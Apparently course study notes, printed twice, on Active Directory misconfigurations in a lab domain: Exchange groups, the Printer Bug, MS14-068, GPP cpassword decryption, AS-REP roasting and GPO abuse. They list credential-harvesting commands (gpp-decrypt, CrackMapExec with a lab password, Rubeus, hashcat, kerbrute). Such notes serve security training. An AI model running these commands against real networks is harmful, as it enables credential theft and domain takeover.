23.Miscellaneous Misconfigurations

Key Concepts:

The Exchange Windows Permissions group, if misconfigured, allows for DCSync privileges.
The Organization Management group grants extensive control over Exchange and mailboxes.
Compromised Exchange servers are prime targets for credential dumping.
PrivExchange: Exploiting the PushSubscription feature for NTLM relay and potential domain compromise.

Printer Bug (MS-RPRN Protocol Flaw)

Key Concepts:

The MS-RPRN protocol flaw allows for NTLM relay via the Print Spooler service.
This can lead to DCSync privileges or Resource-Based Constrained Delegation (RBCD) exploitation.
It can be used to attack across forest trusts.

Commands:

Import-Module .\SecurityAssessment.ps1
Get-SpoolStatus -ComputerName ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL

MS14-068 (Kerberos PAC Forging)

Key Concepts:

This vulnerability allows for forging Kerberos PACs to elevate privileges.
Patching is the only effective defense.

Sniffing LDAP Credentials

Key Concepts:

Exploiting weak configurations in applications and printers that store LDAP credentials.
Using netcat to capture credentials.

Enumerating DNS Records (adidnsdump)

Key Concepts:

Using adidnsdump to discover hidden DNS records.

Commands:

adidnsdump -u inlanefreight\\forend ldap://172.16.5.5
adidnsdump -u inlanefreight\\forend ldap://172.16.5.5 -r

Other Misconfigurations

Password in Description Field:

Get-DomainUser * | Select-Object samaccountname,description | Where-Object {$_.Description -ne $null}

PASSWD_NOTREQD Field:

Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol

Credentials in SMB Shares and SYSVOL Scripts:

ls \\academy-ea-dc01\SYSVOL\INLANEFREIGHT.LOCAL\scripts
cat \\academy-ea-dc01\SYSVOL\INLANEFREIGHT.LOCAL\scripts\reset_local_admin_pass.vbs

Group Policy Preferences (GPP) Passwords

Key Concepts:

Exploiting cpassword values in GPP XML files.
Using gpp-decrypt and CrackMapExec.

Commands:

gpp-decrypt VPe/o9YRyz2cksnYRbNeQj35w9KxQ5ttbvtRaAVqxaE
crackmapexec smb -L | grep gpp
crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_autologin

AS-REP Roasting

Key Concepts:

Exploiting accounts with "Do not require Kerberos pre-authentication" enabled.
Using Rubeus, Hashcat, and Kerbrute.

Commands:

Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl

./Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat

hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txt

kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt

GetNPUsers.py INLANEFREIGHT.LOCAL/ -dc-ip 172.16.5.5 -no-pass -usersfile valid_ad_users

Group Policy Object (GPO) Abuse

Key Concepts:

Exploiting misconfigured GPO permissions for privilege escalation and persistence.
Abusing GPOs to:
- Add local admin accounts
- Create scheduled tasks
- Grant additional privileges to users

Previous22.Bleeding Edge Vulnerabilities Next9.Why So Trusting

Last updated 12 days ago

23.Miscellaneous Misconfigurations

Key Concepts:

The Exchange Windows Permissions group, if misconfigured, allows for DCSync privileges.
The Organization Management group grants extensive control over Exchange and mailboxes.
Compromised Exchange servers are prime targets for credential dumping.
PrivExchange: Exploiting the PushSubscription feature for NTLM relay and potential domain compromise.

Printer Bug (MS-RPRN Protocol Flaw)

Key Concepts:

The MS-RPRN protocol flaw allows for NTLM relay via the Print Spooler service.
This can lead to DCSync privileges or Resource-Based Constrained Delegation (RBCD) exploitation.
It can be used to attack across forest trusts.

Commands:

Import-Module .\SecurityAssessment.ps1
Get-SpoolStatus -ComputerName ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL

MS14-068 (Kerberos PAC Forging)

Key Concepts:

This vulnerability allows for forging Kerberos PACs to elevate privileges.
Patching is the only effective defense.

Sniffing LDAP Credentials

Key Concepts:

Exploiting weak configurations in applications and printers that store LDAP credentials.
Using netcat to capture credentials.

Enumerating DNS Records (adidnsdump)

Key Concepts:

Using adidnsdump to discover hidden DNS records.

Commands:

adidnsdump -u inlanefreight\\forend ldap://172.16.5.5
adidnsdump -u inlanefreight\\forend ldap://172.16.5.5 -r

Other Misconfigurations

Password in Description Field:

Get-DomainUser * | Select-Object samaccountname,description | Where-Object {$_.Description -ne $null}

PASSWD_NOTREQD Field:

Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol

Credentials in SMB Shares and SYSVOL Scripts:

ls \\academy-ea-dc01\SYSVOL\INLANEFREIGHT.LOCAL\scripts
cat \\academy-ea-dc01\SYSVOL\INLANEFREIGHT.LOCAL\scripts\reset_local_admin_pass.vbs

Group Policy Preferences (GPP) Passwords

Key Concepts:

Exploiting cpassword values in GPP XML files.
Using gpp-decrypt and CrackMapExec.

Commands:

gpp-decrypt VPe/o9YRyz2cksnYRbNeQj35w9KxQ5ttbvtRaAVqxaE
crackmapexec smb -L | grep gpp
crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_autologin

AS-REP Roasting

Key Concepts:

Exploiting accounts with "Do not require Kerberos pre-authentication" enabled.
Using Rubeus, Hashcat, and Kerbrute.

Commands:

Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl

./Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat

hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txt

kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt

GetNPUsers.py INLANEFREIGHT.LOCAL/ -dc-ip 172.16.5.5 -no-pass -usersfile valid_ad_users

Group Policy Object (GPO) Abuse

Key Concepts:

Exploiting misconfigured GPO permissions for privilege escalation and persistence.
Abusing GPOs to:
- Add local admin accounts
- Create scheduled tasks
- Grant additional privileges to users

Previous22.Bleeding Edge Vulnerabilities Next9.Why So Trusting

Last updated 12 days ago